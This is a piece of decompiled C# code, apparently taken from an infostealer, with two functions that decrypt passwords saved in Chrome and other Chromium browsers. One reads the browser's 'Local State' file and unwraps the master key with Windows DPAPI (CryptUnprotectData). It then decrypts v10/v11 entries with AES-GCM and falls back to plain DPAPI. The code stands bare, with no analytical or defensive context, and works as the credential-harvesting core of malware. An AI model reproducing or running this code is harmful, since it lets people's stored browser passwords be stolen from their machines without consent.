// Token: 0x06000080 RID: 128 RVA: 0x00006CC0 File Offset: 0x00004EC0
public static string decryptChrome(string password, string browser = "")
{
if (password.StartsWith("v10") || password.StartsWith("v11"))
{
string path = "";
string[] array = new string[]
{
"",
"\\..",
"\\..\\.."
};
foreach (string str in array)
{
path = Path.GetDirectoryName(browser) + str + "\\Local State";
if (File.Exists(path))
{
break;
}
path = null;
}
string text = File.ReadAllText(path);
string[] array3 = Regex.Split(text, "\"");
int num = 0;
foreach (string a in array3)
{
if (a == "encrypted_key")
{
text = array3[num + 2];
break;
}
num++;
}
byte[] key = DecryptAPI.DecryptBrowsers(Encoding.Default.GetBytes(Encoding.Default.GetString(Convert.FromBase64String(text)).Remove(0, 5)), null);
try
{
string s = password.Substring(3, 12);
string s2 = password.Substring(15);
byte[] bytes = Encoding.Default.GetBytes(s);
return(AesGcm256.Decrypt(Encoding.Default.GetBytes(s2), key, bytes));
}
catch
{
return("failed (AES-GCM)");
}
}
string result;
try
{
result = Encoding.Default.GetString(DecryptAPI.DecryptBrowsers(Encoding.Default.GetBytes(password), null));
}
catch
{
result = "failed (DPAPI)";
}
return(result);
}
// Token: 0x06000003 RID: 3 RVA: 0x000024D4 File Offset: 0x000006D4
public static byte[] DecryptBrowsers(byte[] cipherTextBytes, byte[] entropyBytes = null)
{
DecryptAPI.DataBlob dataBlob = default(DecryptAPI.DataBlob);
DecryptAPI.DataBlob dataBlob2 = default(DecryptAPI.DataBlob);
DecryptAPI.DataBlob dataBlob3 = default(DecryptAPI.DataBlob);
DecryptAPI.CryptprotectPromptstruct cryptprotectPromptstruct = new DecryptAPI.CryptprotectPromptstruct
{
cbSize = Marshal.SizeOf(typeof(DecryptAPI.CryptprotectPromptstruct)),
dwPromptFlags = 0,
hwndApp = IntPtr.Zero,
szPrompt = null
};
string empty = string.Empty;
try
{
try
{
if (cipherTextBytes == null)
{
cipherTextBytes = new byte[0];
}
dataBlob2.pbData = Marshal.AllocHGlobal(cipherTextBytes.Length);
dataBlob2.cbData = cipherTextBytes.Length;
Marshal.Copy(cipherTextBytes, 0, dataBlob2.pbData, cipherTextBytes.Length);
}
catch
{
}
try
{
if (entropyBytes == null)
{
entropyBytes = new byte[0];
}
dataBlob3.pbData = Marshal.AllocHGlobal(entropyBytes.Length);
dataBlob3.cbData = entropyBytes.Length;
Marshal.Copy(entropyBytes, 0, dataBlob3.pbData, entropyBytes.Length);
}
catch
{
}
DecryptAPI.CryptUnprotectData(ref dataBlob2, ref empty, ref dataBlob3, IntPtr.Zero, ref cryptprotectPromptstruct, 1, ref dataBlob);
byte[] array = new byte[dataBlob.cbData];
Marshal.Copy(dataBlob.pbData, array, 0, dataBlob.cbData);
return(array);
}
catch
{
}
finally
{
if (dataBlob.pbData != IntPtr.Zero)
{
Marshal.FreeHGlobal(dataBlob.pbData);
}
if (dataBlob2.pbData != IntPtr.Zero)
{
Marshal.FreeHGlobal(dataBlob2.pbData);
}
if (dataBlob3.pbData != IntPtr.Zero)
{
Marshal.FreeHGlobal(dataBlob3.pbData);
}
}
return(new byte[0]);
}